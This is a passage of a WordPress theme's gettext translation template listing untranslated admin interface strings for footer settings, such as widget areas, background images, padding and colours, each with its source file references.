framework-customizations/extensions/faq/widgets/faq-category/views/admin.php:46 msgid "Choose FAQ category to show" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:7 #: framework-customizations/extensions/footers/footers/footer-02/options.php:7 #: framework-customizations/extensions/footers/footers/footer-03/options.php:7 #: framework-customizations/extensions/footers/footers/footer-04/options.php:7 #: framework-customizations/theme/options/footer-options.php:5 #: framework-customizations/theme/options/post-settings.php:10 #: framework-customizations/theme/options/template-settings.php:4 msgid "-- Select widget area --" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:9 #: framework-customizations/extensions/footers/footers/footer-02/options.php:9 #: framework-customizations/extensions/footers/footers/footer-03/options.php:9 #: framework-customizations/extensions/footers/footers/footer-04/options.php:9 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:3 #: framework-customizations/theme/options/posts/page.php:61 msgid "-- Select Menu --" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:14 #: framework-customizations/extensions/footers/footers/footer-02/options.php:14 #: framework-customizations/extensions/footers/footers/footer-03/options.php:14 #: framework-customizations/extensions/footers/footers/footer-04/options.php:14 #: framework-customizations/extensions/headers/headers/header-09/config.php:22 #: framework-customizations/theme/options/footer-options.php:70 msgid "Light" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:15 #: framework-customizations/extensions/footers/footers/footer-02/options.php:15 #: framework-customizations/extensions/footers/footers/footer-03/options.php:15 #: framework-customizations/extensions/footers/footers/footer-04/options.php:15 #: framework-customizations/extensions/headers/headers/header-09/config.php:21 #: framework-customizations/theme/options/footer-options.php:71 msgid "Dark" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:30 #: framework-customizations/extensions/footers/footers/footer-02/options.php:29 #: framework-customizations/extensions/footers/footers/footer-03/options.php:29 #: framework-customizations/extensions/footers/footers/footer-04/options.php:29 #: framework-customizations/theme/options/posts/page.php:81 #: framework-customizations/theme/options/posts/post.php:34 #: framework-customizations/theme/options/posts/product.php:29 #: framework-customizations/theme/options/posts/slz-faq.php:29 #: framework-customizations/theme/options/posts/slz-portfolio.php:29 #: framework-customizations/theme/options/posts/slz-service.php:29 #: framework-customizations/theme/options/posts/slz-team.php:29 msgid "General Settings" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:33 #: framework-customizations/extensions/footers/footers/footer-02/options.php:32 #: framework-customizations/extensions/footers/footers/footer-03/options.php:32 #: framework-customizations/extensions/footers/footers/footer-04/options.php:32 msgid "Footer Undercover" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:37 #: framework-customizations/extensions/footers/footers/footer-01/options.php:62 #: framework-customizations/extensions/footers/footers/footer-01/options.php:191 #: framework-customizations/extensions/footers/footers/footer-01/options.php:323 #: framework-customizations/extensions/footers/footers/footer-02/options.php:36 #: framework-customizations/extensions/footers/footers/footer-02/options.php:61 #: framework-customizations/extensions/footers/footers/footer-02/options.php:190 #: framework-customizations/extensions/footers/footers/footer-02/options.php:316 #: framework-customizations/extensions/footers/footers/footer-03/options.php:36 #: framework-customizations/extensions/footers/footers/footer-03/options.php:61 #: framework-customizations/extensions/footers/footers/footer-03/options.php:190 #: framework-customizations/extensions/footers/footers/footer-03/options.php:304 #: framework-customizations/extensions/footers/footers/footer-04/options.php:36 #: framework-customizations/extensions/footers/footers/footer-04/options.php:61 #: framework-customizations/extensions/footers/footers/footer-04/options.php:190 #: framework-customizations/extensions/footers/footers/footer-04/options.php:308 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:143 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:214 #: framework-customizations/extensions/headers/headers/header-09/options.php:90 #: framework-customizations/extensions/headers/headers/header-09/options.php:124 #: framework-customizations/extensions/headers/headers/header-09/options.php:151 #: framework-customizations/extensions/headers/headers/header-09/options.php:222 #: framework-customizations/theme/options/footer-options.php:20 #: framework-customizations/theme/options/footer-options.php:55 #: framework-customizations/theme/options/footer-options.php:98 #: framework-customizations/theme/options/general-settings.php:162 #: framework-customizations/theme/options/general-settings.php:176 #: framework-customizations/theme/options/general-settings.php:290 #: framework-customizations/theme/options/general-settings.php:304 #: framework-customizations/theme/options/general-settings.php:338 #: framework-customizations/theme/options/page-boxed-layout.php:24 #: framework-customizations/theme/options/page-header-settings.php:133 #: framework-customizations/theme/options/page-header-settings.php:204 #: framework-customizations/theme/options/page-header-settings.php:276 #: framework-customizations/theme/options/page-header-settings.php:330 #: framework-customizations/theme/options/page-header-settings.php:364 #: framework-customizations/theme/options/page-header-settings.php:411 #: framework-customizations/theme/options/page-options.php:61 #: framework-customizations/theme/options/page-options.php:144 #: framework-customizations/theme/options/page-options.php:183 #: framework-customizations/theme/options/post-settings.php:46 #: framework-customizations/theme/options/post-settings.php:83 #: framework-customizations/theme/options/posts/page.php:50 #: framework-customizations/theme/options/speed-optimize.php:143 #: framework-customizations/theme/options/speed-optimize.php:157 #: framework-customizations/theme/options/speed-optimize.php:200 #: framework-customizations/theme/options/speed-optimize.php:226 #: framework-customizations/theme/options/speed-optimize.php:244 #: framework-customizations/theme/options/speed-optimize.php:293 #: framework-customizations/theme/options/speed-optimize.php:335 msgid "Enable" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:41 #: framework-customizations/extensions/footers/footers/footer-01/options.php:66 #: framework-customizations/extensions/footers/footers/footer-01/options.php:195 #: framework-customizations/extensions/footers/footers/footer-01/options.php:327 #: framework-customizations/extensions/footers/footers/footer-02/options.php:40 #: framework-customizations/extensions/footers/footers/footer-02/options.php:65 #: framework-customizations/extensions/footers/footers/footer-02/options.php:194 #: framework-customizations/extensions/footers/footers/footer-02/options.php:320 #: framework-customizations/extensions/footers/footers/footer-03/options.php:40 #: framework-customizations/extensions/footers/footers/footer-03/options.php:65 #: framework-customizations/extensions/footers/footers/footer-03/options.php:194 #: framework-customizations/extensions/footers/footers/footer-03/options.php:308 #: framework-customizations/extensions/footers/footers/footer-04/options.php:40 #: framework-customizations/extensions/footers/footers/footer-04/options.php:65 #: framework-customizations/extensions/footers/footers/footer-04/options.php:194 #: framework-customizations/extensions/footers/footers/footer-04/options.php:312 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:147 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:218 #: framework-customizations/extensions/headers/headers/header-09/options.php:94 #: framework-customizations/extensions/headers/headers/header-09/options.php:120 #: framework-customizations/extensions/headers/headers/header-09/options.php:147 #: framework-customizations/extensions/headers/headers/header-09/options.php:218 #: framework-customizations/theme/options/advertisement-settings.php:38 #: framework-customizations/theme/options/footer-options.php:24 #: framework-customizations/theme/options/footer-options.php:59 #: framework-customizations/theme/options/footer-options.php:102 #: framework-customizations/theme/options/general-settings.php:158 #: framework-customizations/theme/options/general-settings.php:180 #: framework-customizations/theme/options/general-settings.php:286 #: framework-customizations/theme/options/general-settings.php:300 #: framework-customizations/theme/options/general-settings.php:342 #: framework-customizations/theme/options/page-boxed-layout.php:20 #: framework-customizations/theme/options/page-header-settings.php:129 #: framework-customizations/theme/options/page-header-settings.php:200 #: framework-customizations/theme/options/page-header-settings.php:272 #: framework-customizations/theme/options/page-header-settings.php:326 #: framework-customizations/theme/options/page-header-settings.php:360 #: framework-customizations/theme/options/page-header-settings.php:407 #: framework-customizations/theme/options/page-options.php:57 #: framework-customizations/theme/options/page-options.php:140 #: framework-customizations/theme/options/page-options.php:179 #: framework-customizations/theme/options/post-settings.php:42 #: framework-customizations/theme/options/post-settings.php:79 #: framework-customizations/theme/options/posts/page.php:54 #: framework-customizations/theme/options/speed-optimize.php:147 #: framework-customizations/theme/options/speed-optimize.php:161 #: framework-customizations/theme/options/speed-optimize.php:204 #: framework-customizations/theme/options/speed-optimize.php:230 #: framework-customizations/theme/options/speed-optimize.php:248 #: framework-customizations/theme/options/speed-optimize.php:297 #: framework-customizations/theme/options/speed-optimize.php:339 msgid "Disable" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:49 #: framework-customizations/extensions/footers/footers/footer-02/options.php:48 #: framework-customizations/extensions/footers/footers/footer-03/options.php:48 #: framework-customizations/extensions/footers/footers/footer-04/options.php:48 msgid "Footer Top Settings" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:57 #: framework-customizations/extensions/footers/footers/footer-02/options.php:56 #: framework-customizations/extensions/footers/footers/footer-03/options.php:56 #: framework-customizations/extensions/footers/footers/footer-04/options.php:56 #: framework-customizations/theme/options/footer-options.php:15 #: framework-customizations/theme/options/posts/page.php:45 msgid "Enable Footer Top" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:58 #: framework-customizations/extensions/footers/footers/footer-02/options.php:57 #: framework-customizations/extensions/footers/footers/footer-03/options.php:57 #: framework-customizations/extensions/footers/footers/footer-04/options.php:57 #: framework-customizations/theme/options/footer-options.php:16 #: framework-customizations/theme/options/posts/page.php:46 msgid "Enable the footer top?" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:76 #: framework-customizations/extensions/footers/footers/footer-02/options.php:75 #: framework-customizations/extensions/footers/footers/footer-03/options.php:75 #: framework-customizations/extensions/footers/footers/footer-04/options.php:75 #: framework-customizations/extensions/footers/footers/footer-04/options.php:256 #: framework-customizations/theme/options/footer-options.php:34 #: framework-customizations/theme/options/footer-options.php:77 msgid "Choose Widget Area" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:77 #: framework-customizations/extensions/footers/footers/footer-02/options.php:76 #: framework-customizations/extensions/footers/footers/footer-03/options.php:76 #: framework-customizations/extensions/footers/footers/footer-04/options.php:76 #: framework-customizations/theme/options/footer-options.php:35 msgid "Choose widget area will show in footer top" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:87 #: framework-customizations/extensions/footers/footers/footer-02/options.php:86 #: framework-customizations/extensions/footers/footers/footer-03/options.php:86 #: framework-customizations/extensions/footers/footers/footer-04/options.php:86 msgid "Change the style of footer top" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:93 #: framework-customizations/extensions/footers/footers/footer-02/options.php:92 #: framework-customizations/extensions/footers/footers/footer-03/options.php:92 #: framework-customizations/extensions/footers/footers/footer-04/options.php:92 msgid "Select background color for footer top" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:100 #: framework-customizations/extensions/footers/footers/footer-01/options.php:350 #: framework-customizations/extensions/footers/footers/footer-02/options.php:99 #: framework-customizations/extensions/footers/footers/footer-02/options.php:343 #: framework-customizations/extensions/footers/footers/footer-03/options.php:99 #: framework-customizations/extensions/footers/footers/footer-03/options.php:331 #: framework-customizations/extensions/footers/footers/footer-04/options.php:99 #: framework-customizations/extensions/footers/footers/footer-04/options.php:335 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:69 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:82 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:14 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:21 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:27 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:22 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:21 #: framework-customizations/theme/options/general-settings.php:73 #: framework-customizations/theme/options/page-404-settings.php:50 #: framework-customizations/theme/options/page-boxed-layout.php:49 #: framework-customizations/theme/options/page-header-settings.php:59 #: framework-customizations/theme/options/page-options.php:105 #: framework-customizations/theme/options/posts/page.php:127 msgid "Background Image" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:101 #: framework-customizations/extensions/footers/footers/footer-01/options.php:351 #: framework-customizations/extensions/footers/footers/footer-02/options.php:100 #: framework-customizations/extensions/footers/footers/footer-02/options.php:344 #: framework-customizations/extensions/footers/footers/footer-03/options.php:100 #: framework-customizations/extensions/footers/footers/footer-03/options.php:332 #: framework-customizations/extensions/footers/footers/footer-04/options.php:100 #: framework-customizations/extensions/footers/footers/footer-04/options.php:336 msgid "Upload the background image .png or .jpg" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:106 #: framework-customizations/extensions/footers/footers/footer-01/options.php:229 #: framework-customizations/extensions/footers/footers/footer-01/options.php:356 #: framework-customizations/extensions/footers/footers/footer-02/options.php:105 #: framework-customizations/extensions/footers/footers/footer-02/options.php:228 #: framework-customizations/extensions/footers/footers/footer-02/options.php:349 #: framework-customizations/extensions/footers/footers/footer-03/options.php:105 #: framework-customizations/extensions/footers/footers/footer-03/options.php:228 #: framework-customizations/extensions/footers/footers/footer-03/options.php:337 #: framework-customizations/extensions/footers/footers/footer-04/options.php:105 #: framework-customizations/extensions/footers/footers/footer-04/options.php:228 #: framework-customizations/extensions/footers/footers/footer-04/options.php:341 #: framework-customizations/theme/options/page-header-settings.php:80 msgid "Background Attachment" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:111 #: framework-customizations/extensions/footers/footers/footer-01/options.php:234 #: framework-customizations/extensions/footers/footers/footer-01/options.php:361 #: framework-customizations/extensions/footers/footers/footer-02/options.php:110 #: framework-customizations/extensions/footers/footers/footer-02/options.php:233 #: framework-customizations/extensions/footers/footers/footer-02/options.php:354 #: framework-customizations/extensions/footers/footers/footer-03/options.php:110 #: framework-customizations/extensions/footers/footers/footer-03/options.php:233 #: framework-customizations/extensions/footers/footers/footer-03/options.php:342 #: framework-customizations/extensions/footers/footers/footer-04/options.php:110 #: framework-customizations/extensions/footers/footers/footer-04/options.php:233 #: framework-customizations/extensions/footers/footers/footer-04/options.php:346 #: framework-customizations/theme/options/page-header-settings.php:85 msgid "Background Size" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:116 #: framework-customizations/extensions/footers/footers/footer-01/options.php:239 #: framework-customizations/extensions/footers/footers/footer-01/options.php:366 #: framework-customizations/extensions/footers/footers/footer-02/options.php:115 #: framework-customizations/extensions/footers/footers/footer-02/options.php:238 #: framework-customizations/extensions/footers/footers/footer-02/options.php:359 #: framework-customizations/extensions/footers/footers/footer-03/options.php:115 #: framework-customizations/extensions/footers/footers/footer-03/options.php:238 #: framework-customizations/extensions/footers/footers/footer-03/options.php:347 #: framework-customizations/extensions/footers/footers/footer-04/options.php:115 #: framework-customizations/extensions/footers/footers/footer-04/options.php:238 #: framework-customizations/extensions/footers/footers/footer-04/options.php:351 #: framework-customizations/theme/options/page-header-settings.php:90 msgid "Background Position" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:121 #: framework-customizations/extensions/footers/footers/footer-02/options.php:120 #: framework-customizations/extensions/footers/footers/footer-03/options.php:120 #: framework-customizations/extensions/footers/footers/footer-04/options.php:120 msgid "Border Bottom Color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:122 #: framework-customizations/extensions/footers/footers/footer-01/options.php:372 #: framework-customizations/extensions/footers/footers/footer-02/options.php:121 #: framework-customizations/extensions/footers/footers/footer-02/options.php:365 #: framework-customizations/extensions/footers/footers/footer-03/options.php:121 #: framework-customizations/extensions/footers/footers/footer-03/options.php:353 #: framework-customizations/extensions/footers/footers/footer-04/options.php:121 #: framework-customizations/extensions/footers/footers/footer-04/options.php:357 msgid "Choose border top color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:126 #: framework-customizations/extensions/footers/footers/footer-02/options.php:125 #: framework-customizations/extensions/footers/footers/footer-03/options.php:125 #: framework-customizations/extensions/footers/footers/footer-04/options.php:125 msgid "Select footer's top bar text color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:132 #: framework-customizations/extensions/footers/footers/footer-02/options.php:131 #: framework-customizations/extensions/footers/footers/footer-03/options.php:131 #: framework-customizations/extensions/footers/footers/footer-04/options.php:131 msgid "Text Alignment" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:133 #: framework-customizations/extensions/footers/footers/footer-02/options.php:132 #: framework-customizations/extensions/footers/footers/footer-03/options.php:132 #: framework-customizations/extensions/footers/footers/footer-04/options.php:132 msgid "Setting text alignment" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:138 #: framework-customizations/extensions/footers/footers/footer-02/options.php:137 #: framework-customizations/extensions/footers/footers/footer-03/options.php:137 #: framework-customizations/extensions/footers/footers/footer-04/options.php:137 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:17 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:16 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:9 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:13 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:38 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:5 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:11 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:21 #: framework-customizations/theme/options/page-header-settings.php:5 msgid "Left" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:139 #: framework-customizations/extensions/footers/footers/footer-02/options.php:138 #: framework-customizations/extensions/footers/footers/footer-03/options.php:138 #: framework-customizations/extensions/footers/footers/footer-04/options.php:138 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:18 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:17 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:16 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:37 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:12 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:20 #: framework-customizations/theme/options/page-header-settings.php:7 msgid "Center" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:140 #: framework-customizations/extensions/footers/footers/footer-02/options.php:139 #: framework-customizations/extensions/footers/footers/footer-03/options.php:139 #: framework-customizations/extensions/footers/footers/footer-04/options.php:139 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:19 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:18 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:17 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:13 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:39 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:13 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:22 #: framework-customizations/theme/options/page-header-settings.php:6 msgid "Right" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:147 #: framework-customizations/extensions/footers/footers/footer-01/options.php:280 #: framework-customizations/extensions/footers/footers/footer-02/options.php:146 #: framework-customizations/extensions/footers/footers/footer-02/options.php:273 #: framework-customizations/extensions/footers/footers/footer-03/options.php:146 #: framework-customizations/extensions/footers/footers/footer-03/options.php:261 #: framework-customizations/extensions/footers/footers/footer-04/options.php:146 #: framework-customizations/extensions/footers/footers/footer-04/options.php:265 msgid "Show Other Content?" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:148 #: framework-customizations/extensions/footers/footers/footer-01/options.php:281 #: framework-customizations/extensions/footers/footers/footer-02/options.php:147 #: framework-customizations/extensions/footers/footers/footer-02/options.php:274 #: framework-customizations/extensions/footers/footers/footer-03/options.php:147 #: framework-customizations/extensions/footers/footers/footer-03/options.php:262 #: framework-customizations/extensions/footers/footers/footer-04/options.php:147 #: framework-customizations/extensions/footers/footers/footer-04/options.php:266 msgid "Choose show or hide other content in footer." msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:161 #: framework-customizations/extensions/footers/footers/footer-01/options.php:294 #: framework-customizations/extensions/footers/footers/footer-02/options.php:160 #: framework-customizations/extensions/footers/footers/footer-02/options.php:287 #: framework-customizations/extensions/footers/footers/footer-03/options.php:160 #: framework-customizations/extensions/footers/footers/footer-03/options.php:275 #: framework-customizations/extensions/footers/footers/footer-04/options.php:160 #: framework-customizations/extensions/footers/footers/footer-04/options.php:279 msgid "Other Content" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:162 #: framework-customizations/extensions/footers/footers/footer-01/options.php:295 #: framework-customizations/extensions/footers/footers/footer-02/options.php:161 #: framework-customizations/extensions/footers/footers/footer-02/options.php:288 #: framework-customizations/extensions/footers/footers/footer-03/options.php:161 #: framework-customizations/extensions/footers/footers/footer-03/options.php:276 #: framework-customizations/extensions/footers/footers/footer-04/options.php:161 #: framework-customizations/extensions/footers/footers/footer-04/options.php:280 msgid "Enter other content in footer." msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:178 #: framework-customizations/extensions/footers/footers/footer-02/options.php:177 #: framework-customizations/extensions/footers/footers/footer-03/options.php:177 #: framework-customizations/extensions/footers/footers/footer-04/options.php:177 msgid "Footer Content Settings" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:186 #: framework-customizations/extensions/footers/footers/footer-02/options.php:185 #: framework-customizations/extensions/footers/footers/footer-03/options.php:185 #: framework-customizations/extensions/footers/footers/footer-04/options.php:185 #: framework-customizations/theme/options/footer-options.php:50 msgid "Enable Footer Main" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:187 #: framework-customizations/extensions/footers/footers/footer-02/options.php:186 #: framework-customizations/extensions/footers/footers/footer-03/options.php:186 #: framework-customizations/extensions/footers/footers/footer-04/options.php:186 #: framework-customizations/theme/options/footer-options.php:51 msgid "Enable the footer main?" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:204 #: framework-customizations/extensions/footers/footers/footer-02/options.php:203 #: framework-customizations/extensions/footers/footers/footer-03/options.php:203 #: framework-customizations/extensions/footers/footers/footer-04/options.php:203 #: framework-customizations/theme/options/footer-options.php:68 #: framework-customizations/theme/options/footer-settings.php:24 #: framework-customizations/theme/options/posts/page.php:213 msgid "Footer Style" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:211 #: framework-customizations/extensions/footers/footers/footer-02/options.php:210 #: framework-customizations/extensions/footers/footers/footer-03/options.php:210 #: framework-customizations/extensions/footers/footers/footer-04/options.php:210 msgid "Change the style of footer main" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:216 #: framework-customizations/extensions/footers/footers/footer-02/options.php:215 #: framework-customizations/extensions/footers/footers/footer-03/options.php:215 #: framework-customizations/extensions/footers/footers/footer-04/options.php:215 msgid "Footer Background Color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:217 #: framework-customizations/extensions/footers/footers/footer-02/options.php:216 #: framework-customizations/extensions/footers/footers/footer-03/options.php:216 #: framework-customizations/extensions/footers/footers/footer-04/options.php:216 msgid "Choose background color for footer main." msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:221 #: framework-customizations/extensions/footers/footers/footer-02/options.php:220 #: framework-customizations/extensions/footers/footers/footer-03/options.php:220 #: framework-customizations/extensions/footers/footers/footer-04/options.php:220 msgid "Footer Background Image" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:224 #: framework-customizations/extensions/footers/footers/footer-02/options.php:223 #: framework-customizations/extensions/footers/footers/footer-03/options.php:223 #: framework-customizations/extensions/footers/footers/footer-04/options.php:223 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:73 #: framework-customizations/theme/options/page-404-settings.php:53 msgid "Upload background image." msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:246 #: framework-customizations/extensions/footers/footers/footer-02/options.php:245 #: framework-customizations/extensions/footers/footers/footer-03/options.php:245 #: framework-customizations/extensions/footers/footers/footer-04/options.php:245 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:50 msgid "Padding Top" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:247 #: framework-customizations/extensions/footers/footers/footer-02/options.php:246 #: framework-customizations/extensions/footers/footers/footer-03/options.php:246 #: framework-customizations/extensions/footers/footers/footer-04/options.php:246 msgid "Enter padding top for footer main\"." msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:251 #: framework-customizations/extensions/footers/footers/footer-02/options.php:250 #: framework-customizations/extensions/footers/footers/footer-03/options.php:250 #: framework-customizations/extensions/footers/footers/footer-04/options.php:250 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:58 msgid "Padding Bottom" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:252 #: framework-customizations/extensions/footers/footers/footer-02/options.php:251 #: framework-customizations/extensions/footers/footers/footer-03/options.php:251 #: framework-customizations/extensions/footers/footers/footer-04/options.php:251 msgid "Enter padding bottom for footer main\"." msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:256 #: framework-customizations/extensions/footers/footers/footer-02/options.php:255 #: framework-customizations/extensions/footers/footers/footer-03/options.php:255 msgid "Widget Area 01" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:257 #: framework-customizations/extensions/footers/footers/footer-02/options.php:256 #: framework-customizations/extensions/footers/footers/footer-03/options.php:256 msgid "Choose widget area will show in footer collumn 1" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:262 #: framework-customizations/extensions/footers/footers/footer-02/options.php:261 msgid "Widget Area 02" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:263 #: framework-customizations/extensions/footers/footers/footer-02/options.php:262 msgid "Choose widget area will show in footer collumn 2" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:268 #: framework-customizations/extensions/footers/footers/footer-02/options.php:267 msgid "Widget Area 03" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:269 #: framework-customizations/extensions/footers/footers/footer-02/options.php:268 msgid "Choose widget area will show in footer collumn 3" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:274 msgid "Widget Area 04" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:275 msgid "Choose widget area will show in footer collumn 4" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:310 #: framework-customizations/extensions/footers/footers/footer-02/options.php:303 #: framework-customizations/extensions/footers/footers/footer-03/options.php:291 #: framework-customizations/extensions/footers/footers/footer-04/options.php:295 msgid "Footer Bottom Settings" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:318 #: framework-customizations/extensions/footers/footers/footer-02/options.php:311 #: framework-customizations/extensions/footers/footers/footer-03/options.php:299 #: framework-customizations/extensions/footers/footers/footer-04/options.php:303 #: framework-customizations/theme/options/footer-options.php:93 msgid "Enable Footer Bottom" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:319 #: framework-customizations/extensions/footers/footers/footer-02/options.php:312 #: framework-customizations/extensions/footers/footers/footer-03/options.php:300 #: framework-customizations/extensions/footers/footers/footer-04/options.php:304 #: framework-customizations/theme/options/footer-options.php:94 msgid "Enable the footer bottom?" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:338 #: framework-customizations/extensions/footers/footers/footer-02/options.php:331 #: framework-customizations/extensions/footers/footers/footer-03/options.php:319 #: framework-customizations/extensions/footers/footers/footer-04/options.php:323 msgid "Change the style of footer bottom" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:344 #: framework-customizations/extensions/footers/footers/footer-02/options.php:337 #: framework-customizations/extensions/footers/footers/footer-03/options.php:325 #: framework-customizations/extensions/footers/footers/footer-04/options.php:329 msgid "Select the footer bottom background color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:371 #: framework-customizations/extensions/footers/footers/footer-02/options.php:364 #: framework-customizations/extensions/footers/footers/footer-03/options.php:352 #: framework-customizations/extensions/footers/footers/footer-04/options.php:356 msgid "Border Top Color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:376 #: framework-customizations/extensions/footers/footers/footer-02/options.php:369 #: framework-customizations/extensions/footers/footers/footer-03/options.php:357 #: framework-customizations/extensions/footers/footers/footer-04/options.php:361 msgid "Select footer bottom text color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:381 #: framework-customizations/extensions/footers/footers/footer-02/options.php:374 #: framework-customizations/extensions/footers/footers/footer-03/options.php:362 #: framework-customizations/extensions/footers/footers/footer-04/options.php:366 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:226 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:242 msgid "Social Color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:382 #: framework-customizations/extensions/footers/footers/footer-02/options.php:375 #: framework-customizations/extensions/footers/footers/footer-03/options.php:363 #: 